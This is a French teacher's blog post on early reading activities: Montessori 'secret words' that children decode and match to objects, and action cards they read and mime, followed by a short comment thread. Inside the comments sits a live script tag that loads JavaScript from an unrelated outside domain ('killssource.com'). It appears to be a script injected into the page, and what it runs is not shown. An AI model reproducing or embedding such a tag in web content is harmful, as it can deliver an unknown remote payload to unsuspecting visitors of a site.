• Décoder 1 : mots secrets et billets d'ordre

    Voici le premier article d'une série sur le décodage des mots simples en maternelle (et pourquoi au début du cycle 2).

    Mes élèves encodent grâce aux dictées muettes proposées chez Ti’Loustics. Je ferai bientôt un article à ce sujet.

    Lorsqu’ils ont fini d’encoder, je leur propose les billets de lecture associés même s’ils ne décodent pas vraiment encore. Ils ont en mémoire les mots qu’ils viennent de produire et en associant les sons, ils découvrent facilement les mots écrits. Cet exercice me permet de leur montrer comment on combine les sons pour pouvoir lire le mot. Il me sert également d’évaluation.

     

    Dès que je sens que l’élève est prêt, je lui présente les mots secrets. Cette activité est issue de la pédagogie Montessori, on l'appelle mots secrets parce que l'enfant est invité à lire silencieusement. Elle plait aux élèves parce qu’elle s’apparente à une chasse au trésor ! 

    On lit un mot puis on va chercher l'objet dans la classe ou scotcher l'étiquette dessus. Lorsque les enfants connaissent bien l'activité, on peut aussi organiser un défi en jouant à 2 ou 3. On distribue 3 étiquettes à chaque participant et l'enfant qui ramène les 3 objets le premier a gagné.

     

     Mots secrets et billets d'ordre

    Mots secrets et billets d'ordre

     Mots secrets et billets d'ordre

     

    Dans un premier temps, on choisit les mots les plus simples pour ne pas mettre l’enfant en difficulté en privilégiant les mots avec 2 ou 3 sons. Ensuite, on peut allonger les mots mais on garde les doubles consonnes pour la fin parce que c’est le plus difficile à lire.

    Cette activité a un grand succès ! Néanmoins, elle est chronophage pour moi, d’une part parce que les élèves ne veulent plus s’arrêter, d’autre part parce qu’elle demande un retour immédiat de l’enseignante. C’est pourquoi, je m’en sers comme déclencheur ! Lorsque nous y jouons avec 2 élèves, il y en a généralement 4 autres qui regardent très envieux de pouvoir participer à leur tour !!!

     

     Puis pour varier, j’introduis les billets d’ordre. Le principe reste le même, cette fois-ci l’enfant décode et mime. Il s’agit de verbes d’action très simples.

     

     Mots secrets et billets d'ordre

     

     Je vous propose les fichiers en cursive Dumont mais également en capitales d’imprimerie pour chacun puisse jouer.

     

    Les mots à scotcher en capitales :

     

    Les mots à scotcher en cursive Dumont :

     

    Les actions à mimer en capitales :

     

    Les actions à mimer en cursive Dumont :

     

    « Décoder des mots : récapitulatifDécoder 2 : choisir le bon article »
    Pin It

    Tags Tags : , , , ,
  • Commentaires

    2
    Jeudi 23 Avril 2020 à 21:19
    1
    maitreSmorgane
    Jeudi 23 Avril 2020 à 18:21

    C'est TOP!

    J'imprime de suite!!!!!!

    Merci

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :